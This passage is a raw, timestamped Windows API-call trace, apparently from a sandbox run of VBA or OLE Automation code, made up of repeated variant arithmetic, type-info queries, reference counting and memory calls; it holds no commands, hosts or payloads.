lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.093] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e6a0, pvarResult=0x6b7e678 | out: pvarResult=0x6b7e678) returned 0x0 [0042.093] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e5f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.093] VarAdd (in: pvarLeft=0x6b7e508, pvarRight=0x6b7e538, pvarResult=0x6b7e520 | out: pvarResult=0x6b7e520) returned 0x0 [0042.094] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e588, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.094] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e5e0, pvarResult=0x6b7e5b8 | out: pvarResult=0x6b7e5b8) returned 0x0 [0042.094] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e538, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.094] VarAdd (in: pvarLeft=0x6b7e448, pvarRight=0x6b7e478, pvarResult=0x6b7e460 | out: pvarResult=0x6b7e460) returned 0x0 [0042.094] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e4c8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.094] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e520, pvarResult=0x6b7e4f8 | out: pvarResult=0x6b7e4f8) returned 0x0 [0042.094] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e478, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.094] VarAdd (in: pvarLeft=0x6b7e388, pvarRight=0x6b7e3b8, pvarResult=0x6b7e3a0 | out: pvarResult=0x6b7e3a0) returned 0x0 [0042.095] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e408, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.095] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e460, pvarResult=0x6b7e438 | out: pvarResult=0x6b7e438) returned 0x0 [0042.095] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e3b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.095] VarAdd (in: pvarLeft=0x6b7e2c8, pvarRight=0x6b7e2f8, pvarResult=0x6b7e2e0 | out: pvarResult=0x6b7e2e0) returned 0x0 [0042.095] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e348, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.095] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e3a0, pvarResult=0x6b7e378 | out: pvarResult=0x6b7e378) returned 0x0 [0042.095] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e2f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.095] VarAdd (in: pvarLeft=0x6b7e208, pvarRight=0x6b7e238, pvarResult=0x6b7e220 | out: pvarResult=0x6b7e220) returned 0x0 [0042.095] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e288, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.095] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e2e0, pvarResult=0x6b7e2b8 | out: pvarResult=0x6b7e2b8) returned 0x0 [0042.096] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e238, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.096] VarAdd (in: pvarLeft=0x6b7e148, pvarRight=0x6b7e178, pvarResult=0x6b7e160 | out: pvarResult=0x6b7e160) returned 0x0 [0042.096] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e1c8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.096] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e220, pvarResult=0x6b7e1f8 | out: pvarResult=0x6b7e1f8) returned 0x0 [0042.096] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e178, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.096] VarAdd (in: pvarLeft=0x6b7e088, pvarRight=0x6b7e0b8, pvarResult=0x6b7e0a0 | out: pvarResult=0x6b7e0a0) returned 0x0 [0042.096] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e108, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.096] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e160, pvarResult=0x6b7e138 | out: pvarResult=0x6b7e138) returned 0x0 [0042.097] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7e0b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.097] VarAdd (in: pvarLeft=0x6b7dfc8, pvarRight=0x6b7dff8, pvarResult=0x6b7dfe0 | out: pvarResult=0x6b7dfe0) returned 0x0 [0042.097] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7e048, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.097] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7e0a0, pvarResult=0x6b7e078 | out: pvarResult=0x6b7e078) returned 0x0 [0042.097] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7dff8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.097] VarAdd (in: pvarLeft=0x6b7df08, pvarRight=0x6b7df38, pvarResult=0x6b7df20 | out: pvarResult=0x6b7df20) returned 0x0 [0042.097] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7df88, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.097] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7dfe0, pvarResult=0x6b7dfb8 | out: pvarResult=0x6b7dfb8) returned 0x0 [0042.098] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7df38, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.098] VarAdd (in: pvarLeft=0x6b7de48, pvarRight=0x6b7de78, pvarResult=0x6b7de60 | out: pvarResult=0x6b7de60) returned 0x0 [0042.098] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7dec8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.098] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7df20, pvarResult=0x6b7def8 | out: pvarResult=0x6b7def8) returned 0x0 [0042.098] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7de78, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.098] VarAdd (in: pvarLeft=0x6b7dd88, pvarRight=0x6b7ddb8, pvarResult=0x6b7dda0 | out: pvarResult=0x6b7dda0) returned 0x0 [0042.098] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7de08, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.098] VarAdd (in: pvarLeft=0x6b7eb70, pvarRight=0x6b7de60, pvarResult=0x6b7de38 | out: pvarResult=0x6b7de38) returned 0x0 [0042.098] VarCmp (pvarLeft=0x6b7eb70, pvarRight=0x6b7ddb8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.099] VarAdd (in: pvarLeft=0x6b7dcc8, pvarRight=0x6b7dcf8, pvarResult=0x6b7dce0 | out: pvarResult=0x6b7dce0) returned 0x0 [0042.099] VarCmp (pvarLeft=0x6b7ec18, pvarRight=0x6b7dd48, lcid=0x0, dwFlags=0x30001) returned 0x1 [0042.106] VarSub (in: pvarLeft=0x6b7ec00, pvarRight=0x6b7ec60, pvarResult=0x6b7ec48 | out: pvarResult=0x6b7ec48) returned 0x0 [0042.106] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e68 | out: ppvObject=0x182e68*=0x0) returned 0x80004002 [0042.106] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e60 | out: ppvObject=0x182e60*=0x0) returned 0x80004002 [0042.106] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1830b8, pDummy=0x0 | out: ppTypeAttr=0x1830b8, pDummy=0x0) returned 0x0 [0042.106] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.106] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.106] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.106] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.106] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182650, pDummy=0x0 | out: ppTypeAttr=0x182650, pDummy=0x0) returned 0x0 [0042.106] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.106] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e68 | out: ppvObject=0x182e68*=0x0) returned 0x80004002 [0042.106] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e60 | out: ppvObject=0x182e60*=0x0) returned 0x80004002 [0042.106] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1830b8, pDummy=0x0 | out: ppTypeAttr=0x1830b8, pDummy=0x0) returned 0x0 [0042.106] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.106] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.106] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.106] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.106] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182650, pDummy=0x0 | out: ppTypeAttr=0x182650, pDummy=0x0) returned 0x0 [0042.106] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.107] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.107] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.107] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d98 | out: ppvObject=0x182d98*=0x0) returned 0x80004002 [0042.107] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.107] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182d90, pDummy=0x10 | out: ppTypeAttr=0x182d90, pDummy=0x10) returned 0x0 [0042.107] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.107] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x182d88 | out: pRefType=0x182d88*=0x1302) returned 0x0 [0042.107] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x182da0 | out: ppTInfo=0x182da0*=0x6ceef68) returned 0x0 [0042.108] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.108] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x182d90, pDummy=0x182d70 | out: ppTypeAttr=0x182d90, pDummy=0x182d70*=0x182db0) returned 0x0 [0042.108] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.108] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x182d88 | out: pRefType=0x182d88*=0xf) returned 0x0 [0042.108] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x182da0 | out: ppTInfo=0x182da0*=0x6bbd1c8) returned 0x0 [0042.108] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.108] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x182d90, pDummy=0x182d68 | out: ppTypeAttr=0x182d90, pDummy=0x182d68*=0xf) returned 0x0 [0042.108] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.108] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.108] ITypeInfo:RemoteGetDocumentation (in: This=0x6ceeeb8, memid=0, refPtrFlags=0x182e10, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x800000000 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x800000000) returned 0x0 [0042.108] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=6, lpMultiByteStr=0x182d20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0042.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0042.109] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e28 | out: ppvObject=0x182e28*=0x0) returned 0x80004002 [0042.109] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e20 | out: ppvObject=0x182e20*=0x0) returned 0x80004002 [0042.109] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.109] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x183078, pDummy=0x5e615fe | out: ppTypeAttr=0x183078, pDummy=0x5e615fe*=0x0) returned 0x0 [0042.109] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.109] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.109] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.109] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.109] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182610, pDummy=0x0 | out: ppTypeAttr=0x182610, pDummy=0x0) returned 0x0 [0042.109] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.109] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e68 | out: ppvObject=0x182e68*=0x0) returned 0x80004002 [0042.109] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182e60 | out: ppvObject=0x182e60*=0x0) returned 0x80004002 [0042.109] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1830b8, pDummy=0x0 | out: ppTypeAttr=0x1830b8, pDummy=0x0) returned 0x0 [0042.109] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.109] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.109] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.109] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.109] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182650, pDummy=0x0 | out: ppTypeAttr=0x182650, pDummy=0x0) returned 0x0 [0042.109] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.109] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.109] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.109] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182ac0, pDummy=0x0 | out: ppTypeAttr=0x182ac0, pDummy=0x0) returned 0x0 [0042.109] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.109] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.109] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.109] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182880, pDummy=0x0 | out: ppTypeAttr=0x182880, pDummy=0x0) returned 0x0 [0042.109] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.110] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.110] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.110] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x182ac0, pDummy=0x0 | out: ppTypeAttr=0x182ac0, pDummy=0x0) returned 0x0 [0042.110] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.110] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d0 | out: ppvObject=0x1831d0*=0x0) returned 0x80004002 [0042.110] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d8 | out: ppvObject=0x1831d8*=0x0) returned 0x80004002 [0042.110] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1831c8 | out: ppvObject=0x1831c8*=0x6ceee08) returned 0x0 [0042.110] ITypeInfo2:GetTypeKind (in: This=0x6ceee08, pTypeKind=0x183224 | out: pTypeKind=0x183224*=5) returned 0x0 [0042.110] IUnknown:Release (This=0x6ceee08) returned 0x5 [0042.110] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d8 | out: ppvObject=0x1831d8*=0x0) returned 0x80004002 [0042.110] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.110] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1831d0, pDummy=0x10 | out: ppTypeAttr=0x1831d0, pDummy=0x10) returned 0x0 [0042.110] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.110] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x1831c8 | out: pRefType=0x1831c8*=0x1302) returned 0x0 [0042.110] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x1831e0 | out: ppTInfo=0x1831e0*=0x6ceef68) returned 0x0 [0042.110] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.110] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x1831d0, pDummy=0x1831b0 | out: ppTypeAttr=0x1831d0, pDummy=0x1831b0*=0x1831f0) returned 0x0 [0042.110] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.110] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x1831c8 | out: pRefType=0x1831c8*=0xf) returned 0x0 [0042.110] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x1831e0 | out: ppTInfo=0x1831e0*=0x6bbd1c8) returned 0x0 [0042.111] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.111] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x1831d0, pDummy=0x1831a8 | out: ppTypeAttr=0x1831d0, pDummy=0x1831a8*=0xf) returned 0x0 [0042.111] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.111] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.111] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.111] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.111] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.111] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.111] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182b60, pDummy=0x0 | out: ppTypeAttr=0x182b60, pDummy=0x0) returned 0x0 [0042.111] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.111] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d0 | out: ppvObject=0x1831d0*=0x0) returned 0x80004002 [0042.111] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d8 | out: ppvObject=0x1831d8*=0x0) returned 0x80004002 [0042.111] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1831c8 | out: ppvObject=0x1831c8*=0x6ceee08) returned 0x0 [0042.111] ITypeInfo2:GetTypeKind (in: This=0x6ceee08, pTypeKind=0x183224 | out: pTypeKind=0x183224*=5) returned 0x0 [0042.111] IUnknown:Release (This=0x6ceee08) returned 0x5 [0042.111] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1831d8 | out: ppvObject=0x1831d8*=0x0) returned 0x80004002 [0042.111] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.111] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1831d0, pDummy=0x10 | out: ppTypeAttr=0x1831d0, pDummy=0x10) returned 0x0 [0042.111] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.111] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x1831c8 | out: pRefType=0x1831c8*=0x1302) returned 0x0 [0042.111] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x1831e0 | out: ppTInfo=0x1831e0*=0x6ceef68) returned 0x0 [0042.111] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.111] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x1831d0, pDummy=0x1831b0 | out: ppTypeAttr=0x1831d0, pDummy=0x1831b0*=0x1831f0) returned 0x0 [0042.111] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.111] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x1831c8 | out: pRefType=0x1831c8*=0xf) returned 0x0 [0042.112] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x1831e0 | out: ppTInfo=0x1831e0*=0x6bbd1c8) returned 0x0 [0042.112] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.112] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x1831d0, pDummy=0x1831a8 | out: ppTypeAttr=0x1831d0, pDummy=0x1831a8*=0xf) returned 0x0 [0042.112] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.112] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.112] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.112] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.112] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x1f4) returned 0x6c187f0 [0042.112] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfaf0) [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.112] GetCurrentProcess () returned 0xffffffffffffffff [0042.112] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.112] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.112] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.112] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.112] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.112] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.112] IUnknown:QueryInterface (in: 